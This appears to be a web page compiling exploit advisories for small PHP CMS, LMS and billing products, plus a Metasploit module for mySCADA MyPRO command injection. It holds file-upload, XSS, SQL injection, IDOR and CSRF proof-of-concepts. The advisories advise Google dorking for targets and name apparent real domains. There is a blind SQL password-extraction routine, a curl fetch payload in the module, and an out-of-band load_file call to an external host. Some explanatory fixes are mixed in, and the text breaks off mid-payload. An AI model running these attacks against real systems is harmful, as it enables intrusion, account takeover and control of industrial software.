<pre><code>=============================================================================================================================================<br />| # Title : AccPack Buzz v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The following HTML form uploads an arbitrary file, including an executable server-side script, to the remote target.<br /><br />[+] use payload : <br /><br /><html><br /><head><br /> <title>Add</title><br /></head><br /><body><br /> <div align="center"><br /><form action="http://127.0.0.1/jamiatulamanepalorgp/cms/gallery/insert.php" method="POST" enctype="multipart/form-data"><br /><table><br /> <tr><br /> <td>Image</td><td><br /> <input type="file" name="image-upload" id="image-upload"></td><br /> </tr><br /> <tr><br /> <td>Status</td><td><br /> <input type="radio" name="status" id="active" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> </td><br /> </tr> <br /> <tr style='height:80'><br /> <td colspan="2"><input type='submit' value='Submit'><input type='reset' value='Reset'></td><br /> </tr><br /></table><br /></form><br /></div><br /></body><br /></html><br /><br />[+] On the seventh line (the form action), replace the URL with the target site's cms/gallery/insert.php.<br /><br />[+] Link to the uploaded files : cms/image/gallery/<br /><br />[+] The script stores the upload under a sequential number rather than its original name; to locate your file, try numbers from 9 upward.<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Academy LMS 6.8.1 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://demo.creativeitem.com/academy/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Reflected XSS: the search parameter of /ebook is echoed into the response without output encoding, so the script tag in the payload below is rendered as markup.<br /><br />[+] use payload : /ebook?search=the%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(965964)%3C/ScRiPt%3E<br /><br />[+] https://127.0.0.1/demo.creativeitem.com/academy/ebook?search=the%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(965964)%3C/ScRiPt%3E<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
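The advisory above gives only the probe; the following Python is an added example (not code from Academy LMS or from the advisory author) showing why that probe works and what fixes it. It URL-decodes the advisory's payload, reflects it through two assumed templates that stand in for the search page (the real markup is not on the page), and contrasts raw reflection with `html.escape`. The attribute-context probe `ATTR_PROBE`, the template strings and the function names are assumptions; `<acx>` is the bogus tag inside the advisory's own payload, used here as the reflection canary.

```python
import html
from urllib.parse import unquote

# Probe from the advisory, URL-decoded; <acx> is a bogus tag that serves as a canary.
PROBE_ENCODED = "the%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(965964)%3C/ScRiPt%3E"
PROBE = unquote(PROBE_ENCODED)

# Constructed probe for the attribute context (not from the advisory).
ATTR_PROBE = '" autofocus onfocus="prompt(1)'

# Assumed templates standing in for the /ebook search page; not the product's markup.
TEXT_TEMPLATE = "<h3>Results for: {q}</h3>"
ATTR_TEMPLATE = '<input type="text" name="search" value="{q}">'


def render_text_vulnerable(q):
    """Reflects the query verbatim into element content: the script tag survives."""
    return TEXT_TEMPLATE.format(q=q)


def render_text_safe(q):
    """Entity-encodes & < > " ' before the value reaches the page."""
    return TEXT_TEMPLATE.format(q=html.escape(q))


def render_attr_weak(q):
    """Encodes only & < >; inside a quoted attribute a raw double quote still
    closes the value, so an attacker can append an event handler."""
    return ATTR_TEMPLATE.format(q=html.escape(q, quote=False))


def render_attr_safe(q):
    """quote=True turns " into &quot;, so the value cannot end the attribute."""
    return ATTR_TEMPLATE.format(q=html.escape(q, quote=True))


def reflected_unencoded(body, canary="<acx>"):
    """Scanner-style check: the canary tag came back as markup, not as text."""
    return canary.lower() in body.lower()


if __name__ == "__main__":
    print(PROBE)
    print("vulnerable text context:", reflected_unencoded(render_text_vulnerable(PROBE)))
    print("escaped text context:   ", reflected_unencoded(render_text_safe(PROBE)))
    print("weak attribute context: ", render_attr_weak(ATTR_PROBE))
    print("safe attribute context: ", render_attr_safe(ATTR_PROBE))
```

The two attribute renderers are the caveat worth remembering: encoding `<`, `>` and `&` is enough for element content but not for a value inside a quoted attribute, where the quote character itself has to be encoded.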
<pre><code>====================================================================================================================================<br />| # Title : Chuksrio LMS v2.9 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure Direct Object Reference: the admin header script can be requested directly, giving unauthenticated users access to the administrative interface.<br /><br />[+] use payload : /admin/header.php?captcha<br /><br />[+] https://www/127.0.0.1/mefkayschools.org/admin/header.php?captcha<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AMPLE BILLS v1.0 Administrative Page Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Vulnerability description :<br /><br /><br />An HTML form was found in the response body of this page, yet the page redirects the visitor elsewhere with an HTTP 301/302 status.<br /> Browser users therefore never see the page's contents and cannot interact with the form. <br /><br />Sometimes programmers do not terminate the script after redirecting the user to another page. For example: <br /><?php<br /> if (!isset($_SESSION["authenticated"])) {<br /> header("Location: auth.php");<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br />This script is incorrect because execution continues after the header("Location: auth.php"); line: PHP sends the redirect header and then still renders the rest of the page into the response body. An attacker can read the administration page with any HTTP client that does not follow redirects (an HTTP editor, curl without -L, or a raw socket). This is an authentication bypass. 
<br />The correct code would be <br /><br /><?php<br /> if (!isset($_SESSION["authenticated"])) {<br /> header("Location: auth.php");<br /> exit();<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br /><br />[+] infected item : /pass. <br /><br />[+] Attack details :<br /><br />Form action=''<br /><br />Request<br />GET /ample/index.php?page=add_expense_catagory HTTP/1.1<br />Pragma: no-cache<br />Cache-Control: no-cache<br />Referer: http://127.0.0.1/ample/index.php<br />Acunetix-Aspect: enabled<br />Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c<br />Acunetix-Aspect-Queries: filelist;aspectalerts<br />Cookie: PHPSESSID=d79a5fbv977hkq34ib65osmk8u<br />Host: 127.0.0.1<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br />Accept: */*<br /><br />Response<br />HTTP/1.1 302 Found<br />Date: Sun, 28 Jul 2024 22:44:51 GMT<br />Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30<br />X-Powered-By: PHP/8.0.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />location: login.php<br />Keep-Alive: timeout=5, max=78<br />Connection: Keep-Alive<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 31539<br /><br />The tell is the Content-Length of 31539 bytes on a 302 response: a redirect that terminated correctly would carry an empty or near-empty body, so those bytes are the protected page.<br /><br />[+] The impact of this vulnerability : depends on which page is exposed by the affected web application; here the unauthenticated client receives the add_expense_catagory administration page.<br /><br />[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page, by calling exit() (or die()) immediately after header().<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
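The check a practitioner wants for the pattern above is a client that does not follow redirects and a rule that flags a 3xx response still carrying page content. The following Python is an added example, not code from AMPLE BILLS, the scanner, or the advisory author. `parse_http_response` and `leaks_page_after_redirect` work on raw response bytes; `LEAKY_RESPONSE` and `FIXED_RESPONSE` are constructed to mirror the advisory's exchange (same Server header and `location: login.php`), not captured traffic, and the 512-byte body threshold and the hostnames in `fetch_without_following` are assumptions.

```python
import http.client
import re

REDIRECT_CODES = {301, 302, 303, 307, 308}
FORM_RE = re.compile(rb"<form\b", re.IGNORECASE)


def parse_http_response(raw):
    """Split a raw HTTP/1.1 response into (status, lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def leaks_page_after_redirect(raw, body_limit=512):
    """True when a redirect response still carries the protected page.
    A proper redirect has an empty or tiny body; a body containing a <form>
    or larger than body_limit bytes means the script kept running after header()."""
    status, headers, body = parse_http_response(raw)
    if status not in REDIRECT_CODES or "location" not in headers:
        return False
    return bool(FORM_RE.search(body)) or len(body) > body_limit


def fetch_without_following(host, path, port=80, cookie=None):
    """Request a page with a client that never follows redirects (http.client
    does not), so the body of the 302 itself comes back. Needs a live target;
    not called by the checks below."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    headers = {"Cookie": cookie} if cookie else {}
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    return resp.status, resp.read()


# Constructed responses modelled on the advisory's exchange (not captured traffic).
LEAKY_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30\r\n"
    b"location: login.php\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
    b"<html><head><title>Add Expense Category</title></head><body>"
    b'<form action="" method="post"><input name="name"><input type="submit"></form>'
    b"</body></html>"
)

FIXED_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: login.php\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for label, raw in (("leaky", LEAKY_RESPONSE), ("fixed", FIXED_RESPONSE)):
        print(label, leaks_page_after_redirect(raw))
```

Run the rule over every 3xx a crawler sees; the same check also catches the related case where the redirect is issued only by a `<meta refresh>` or JavaScript, since those responses are 200 and the body is the page itself.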
<pre><code>=============================================================================================================================================<br />| # Title : SchoolPlus v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Remote file upload: uploaded malicious files can be executed remotely.<br /><br />[+] use payload : <br /><br /><html><br /><head><br /> <title>Add</title><br /></head><br /><body><br /> <div align="center"><br /><form action="http://127.0.0.1/jamiatulamanepalorgp/cms/gallery/insert.php" method="POST" enctype="multipart/form-data"><br /><table><br /> <tr><br /> <td>Image</td><td><br /> <input type="file" name="image-upload" id="image-upload"></td><br /> </tr><br /> <tr><br /> <td>Status</td><td><br /> <input type="radio" name="status" id="active" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> </td><br /> </tr> <br /> <tr style='height:80'><br /> <td colspan="2"><input type='submit' value='Submit'><input type='reset' value='Reset'></td><br /> </tr><br /></table><br /></form><br /></div><br /></body><br /></html><br /><br />[+] On the seventh line (the form action), replace the URL with the target site's cms/gallery/insert.php.<br /><br />[+] Link to the uploaded files : cms/image/gallery/<br /><br />[+] The script stores the upload under a sequential number rather than its original name; to locate your file, try numbers from 9 upward.<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Khanepani v1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] SQL injection in the login form: enter the payload below as both the username and the password.<br /><br />[+] use payload : user & pass = ' or 0=0 ##<br /><br />[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Cop CMS v1.0 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] use payload : index.php?project_type_id=1<br /><br />[+] https://www/127.0.0.1/demo/bccn.orgnp/projects/index.php?project_type_id=1 <=== inject here<br /><br />[+] E:\sqlmap>python sqlmap.py -u https://www.bccnorgnp/projects/index.php?project_type_id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs<br /><br />[+] Parameter: project_type_id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: project_type_id=1 AND 5604=5604<br /><br /> Type: stacked queries<br /> Title: MySQL < 5.0.12 stacked queries (BENCHMARK - comment)<br /> Payload: project_type_id=1;SELECT BENCHMARK(5000000,MD5(0x45507849))#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: project_type_id=1 AND (SELECT 5053 FROM (SELECT(SLEEP(5)))tLpS)<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 2 columns<br /> Payload: project_type_id=-7152 UNION ALL SELECT NULL,CONCAT(0x717a766271,0x6e496a5078736e466d5662454c5a6a73517278504b4d786866495454786d56417073505956586b70,0x71716a6a71)-- -<br />---<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
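The two SQL injection advisories above show two contexts: the Khanepani login takes `' or 0=0 ##` in a quoted string, and the Cop CMS `project_type_id` parameter is numeric, which is why sqlmap's boolean-blind payload `1 AND 5604=5604` needs no quote at all. The following Python is an added example, not code from either product, from sqlmap, or from the advisory author. It runs both patterns against an in-memory SQLite database with a constructed schema and rows, shows the parameterized versions, and carries the boolean-blind oracle through to full extraction of a value, the step sqlmap performs after its `AND 5604=5604` detection. `SQLITE_BYPASS` uses `--` because SQLite has no `#` comment; the MySQL payload is kept verbatim as `MYSQL_BYPASS` and only shown as the concatenated query string. Table and column names, the sample password and the character set are assumptions.

```python
import sqlite3

# Payload from the Khanepani advisory (MySQL: '#' starts a comment).
MYSQL_BYPASS = "' or 0=0 ##"
# Same idea for SQLite, whose comment marker is '--' (assumed for this demo).
SQLITE_BYPASS = "' or 0=0 --"


def make_db():
    """Constructed schema and rows; not the products' real tables."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users(username, password) VALUES ('admin', 's3cret');
        CREATE TABLE projects(id INTEGER PRIMARY KEY, project_type_id INTEGER, name TEXT);
        INSERT INTO projects(project_type_id, name) VALUES (1, 'Bridge'), (2, 'Road');
        """
    )
    return con


def build_login_sql(user, pw):
    """The string a vulnerable login concatenates; with MYSQL_BYPASS the '#' comments out
    the password clause, leaving WHERE username='' or 0=0."""
    return f"SELECT id FROM users WHERE username='{user}' AND password='{pw}'"


def vulnerable_login(con, user, pw):
    return con.execute(build_login_sql(user, pw)).fetchone() is not None


def safe_login(con, user, pw):
    """Placeholders: the payload is compared as a literal string and matches nothing."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return con.execute(sql, (user, pw)).fetchone() is not None


def vulnerable_projects(con, project_type_id):
    """Numeric context: nothing to break out of, so 'AND <condition>' is appended as-is."""
    sql = f"SELECT name FROM projects WHERE project_type_id={project_type_id}"
    return [row[0] for row in con.execute(sql)]


def safe_projects(con, project_type_id):
    type_id = int(project_type_id)  # ValueError on anything that is not an integer
    sql = "SELECT name FROM projects WHERE project_type_id=?"
    return [row[0] for row in con.execute(sql, (type_id,))]


def boolean_oracle(con, condition):
    """sqlmap's 'AND 5604=5604' trick: the response is unchanged when the
    condition is true and differs (here: empty) when it is false."""
    baseline = vulnerable_projects(con, "1")
    return vulnerable_projects(con, f"1 AND ({condition})") == baseline


def blind_extract(oracle, subquery, charset="abcdefghijklmnopqrstuvwxyz0123456789", max_len=32):
    """Recover the result of subquery one character at a time from true/false answers."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle(f"substr(({subquery}),{pos},1)='{ch}'"):
                recovered += ch
                break
        else:
            break  # no character matched: end of string reached
    return recovered


def recover_admin_password(con):
    return blind_extract(lambda cond: boolean_oracle(con, cond),
                         "SELECT password FROM users WHERE username='admin'")


if __name__ == "__main__":
    con = make_db()
    print(build_login_sql(MYSQL_BYPASS, MYSQL_BYPASS))
    print("vulnerable login:", vulnerable_login(con, SQLITE_BYPASS, SQLITE_BYPASS))
    print("parameterized login:", safe_login(con, SQLITE_BYPASS, SQLITE_BYPASS))
    print("boolean blind, true/false:", vulnerable_projects(con, "1 AND 5604=5604"),
          vulnerable_projects(con, "1 AND 5604=5605"))
    print("blind extraction:", recover_admin_password(con))
```

The same string-context pattern is what the blog-site `id` advisory further down this page relies on; the fix in every case is the placeholder form, with an explicit integer conversion for numeric parameters so that a condition appended to the value is rejected before it reaches the database.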
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Buzz Cop v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The following HTML code modifies the admin account's details (email, password and status) when a logged-in administrator's browser submits it; modify.php accepts the POST without any anti-CSRF token.<br /><br />[+] Set the form action (the <form action="..."> line) to the target site's cms/user/modify.php, then save the file.<br /><br />[+] infected file : cms/user/modify.php.<br /><br />[+] http://127.0.0.1/q7.3/cms/user/modify.php.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><html><br /><head><br /> <title>User Edit</title><br /></head><br /><body><br /> <div class="container"><br /> <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div><br /> <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST" enctype="multipart/form-data"><br /> <div hidden="true"><br /> <input type="text" name="id" id="id" value="1"><br /> </div><br /> <div><br /> <label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz"><br /> </div><br /> <div><br /> <label for='password'>Password</label><input type="password" class="form-control" name='password' id='password' value="123456"><br /> </div><br /> <div><br /> <label for='status'>Status</label><br /> <input type="radio" name="status" id="active" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> <br /> </div> <br /> <div style='height:80'><br /> <input type='submit' value='Submit'><input type='reset' value='Reset'><br /> </div><br /> </form><br /> </div><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
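The PoC above works because `cms/user/modify.php` trusts any POST that arrives with the admin's session cookie. The following Python is an added example, not code from AccPack Buzz Cop or from the advisory author. It models the handler twice: once as the advisory describes it, applying whatever the form carries, and once hardened with a per-session synchronizer token compared in constant time plus an Origin/Referer check. The user record, the session dictionary, the `site_origin` value and all function names are assumptions; the form values are the ones from the PoC.

```python
import hmac
import secrets
from urllib.parse import urlsplit


def make_users():
    """Constructed sample data (not the product's table)."""
    return {1: {"email": "admin@example.test", "password": "oldpass", "status": 1}}


def apply_changes(form, users):
    """Update logic shared by both handlers: edits the record named by form['id']."""
    user = users[int(form["id"])]
    user["email"] = form["email"]
    if form.get("password"):
        user["password"] = form["password"]
    user["status"] = int(form.get("status", user["status"]))


def modify_user_vulnerable(form, users):
    """modify.php as the advisory describes it: any POST with an id is applied.
    A form on an attacker's page, submitted by a logged-in admin's browser with
    the session cookie attached automatically, rewrites the admin's credentials."""
    apply_changes(form, users)
    return 200, "ok"


def issue_csrf_token(session):
    """Generate one random token per session; embed it in every state-changing form."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def same_origin(headers, site_origin):
    """Secondary defence: Origin (or, failing that, Referer) must name our own site."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == site_origin


def modify_user_hardened(session, form, headers, users, site_origin):
    """Same handler with a synchronizer-token check followed by an origin check.
    Both are evaluated before any write, so a cross-site form changes nothing."""
    expected = session.get("csrf_token", "")
    submitted = str(form.get("csrf_token", ""))
    # Compare on bytes so non-ASCII input cannot make compare_digest raise TypeError.
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return 403, "missing or invalid CSRF token"
    if not same_origin(headers, site_origin):
        return 403, "cross-origin request"
    apply_changes(form, users)
    return 200, "ok"


if __name__ == "__main__":
    attack = {"id": "1", "email": "indoushka@mail.dz", "password": "123456", "status": "1"}
    users = make_users()
    print(modify_user_vulnerable(attack, users), users[1])
    victim_session = {}
    issue_csrf_token(victim_session)
    users = make_users()
    print(modify_user_hardened(victim_session, attack, {"Origin": "https://evil.example"},
                               users, "https://cms.example.test"), users[1])
```

A token minted in the attacker's own session is rejected as well, because the check compares against the token stored in the victim's session, not merely for the presence of some token; setting the session cookie's `SameSite` attribute adds a third, browser-enforced layer.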
<pre><code>class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)',<br /> 'Description' => %q{<br /> Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA.<br /> The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => ['Michael Heinzl'], # Vulnerability discovery & MSF module<br /> 'References' => [<br /> [ 'URL', 'https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06'],<br /> [ 'CVE', '2023-28384']<br /> ],<br /> 'DisclosureDate' => '2022-09-22',<br /> 'Platform' => 'win',<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Windows_Fetch',<br /> {<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },<br /> 'Type' => :win_fetch<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /><br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new(<br /> 'USERNAME',<br /> [ true, 'The username to authenticate with (default: admin)', 'admin' ]<br /> ),<br /> OptString.new(<br /> 'PASSWORD',<br /> [ true, 'The password to authenticate with (default: admin)', 'admin' ]<br /> ),<br /> OptString.new(<br /> 'TARGETURI',<br /> [ true, 'The URI for the MyPRO web interface', '/' ]<br /> )<br /> ]<br /> )<br /> end<br /><br /> # Determine if the MyPRO instance runs a vulnerable version<br /> def check<br /> begin<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => 
normalize_uri(target_uri.path, 'l.fcgi'),<br /> 'vars_post' => {<br /> 't' => '98'<br /> }<br /> })<br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError<br /> return CheckCode::Unknown<br /> end<br /><br /> if res && res.code == 200<br /> data = res.get_json_document<br /> version = data['V']<br /> if version.nil?<br /> return CheckCode::Unknown<br /> else<br /> vprint_status('Version retrieved: ' + version)<br /> end<br /><br /> if Rex::Version.new(version) <= Rex::Version.new('8.28')<br /> return CheckCode::Appears<br /> else<br /> return CheckCode::Safe<br /> end<br /> else<br /> return CheckCode::Unknown<br /> end<br /> end<br /><br /> def exploit<br /> execute_command(payload.encoded)<br /> end<br /><br /> def execute_command(cmd)<br /> print_status('Checking credentials...')<br /> check_auth<br /> print_status('Sending command injection...')<br /> exec_mypro(cmd)<br /> print_status('Exploit finished, check thy shell.')<br /> end<br /><br /> # Check if credentials are working<br /> def check_auth<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'sss2'),<br /> 'headers' => {<br /> 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<br /> }<br /> })<br /><br /> unless res<br /> fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')<br /> end<br /> case res.code<br /> when 200<br /> print_good('Credentials are working.')<br /> when 401<br /> fail_with(Failure::NoAccess, 'Unauthorized access. 
Are your credentials correct?')<br /> else<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')<br /> end<br /> end<br /><br /> # Send command injection<br /> def exec_mypro(cmd)<br /> post_data = {<br /> 'type' => 'sendEmail',<br /> 'addr' => "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com\"&&#{cmd}"<br /> }<br /> post_json = JSON.generate(post_data)<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'data' => post_json,<br /> 'uri' => normalize_uri(target_uri.path, 'sss2'),<br /> 'headers' => {<br /> 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<br /> }<br /><br /> })<br /><br /> # We don't fail if no response is received, as the server will wait until the injected command got executed before returning a response. Typically, this will simply result in a 504 Gateway Time-out error after some time, but there is no indication on whether the injected payload got successfully executed or not from the server response.<br /><br /> if res && res.code == 200 # If the injected command executed and terminated within the timeout, a HTTP status code of 200 is returned.<br /> print_good('Command successfully executed, check your shell.')<br /> end<br /> end<br /><br />end<br /></code></pre>
<pre><code>## Title: blog-site-1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 07/29/2024<br />## Vendor: https://github.com/oretnom23<br />## Software:<br />https://www.sourcecodester.com/php/14442/blog-site-using-phpmysql.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The id parameter appears to be vulnerable to SQL injection attacks. The<br />payload '+(select load_file('\\\\<br />turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+' was submitted<br />in the id parameter. This payload injects a SQL sub-query that calls<br />MySQL's load_file function with a UNC file path that references a URL on an<br />external domain. The application interacted with that domain, indicating<br />that the injected SQL query was executed. The attacker can get all<br />information from the system by using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: page=category&id=-7721' OR 5223=5223 AND 'yTLh'='yTLh<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /> Payload: page=category&id=3'+(select load_file('\\\\<br />turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' AND (SELECT<br />2233 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT<br />(ELT(2233=2233,1))),0x716b626a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Mgsn'='Mgsn<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=category&id=3'+(select load_file('\\\\<br />turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' AND (SELECT<br />5859 FROM (SELECT(SLEEP(7)))tvNV) AND 'ocCx'='ocCx<br /><br /> Type: UNION query<br /> Title: MySQL 
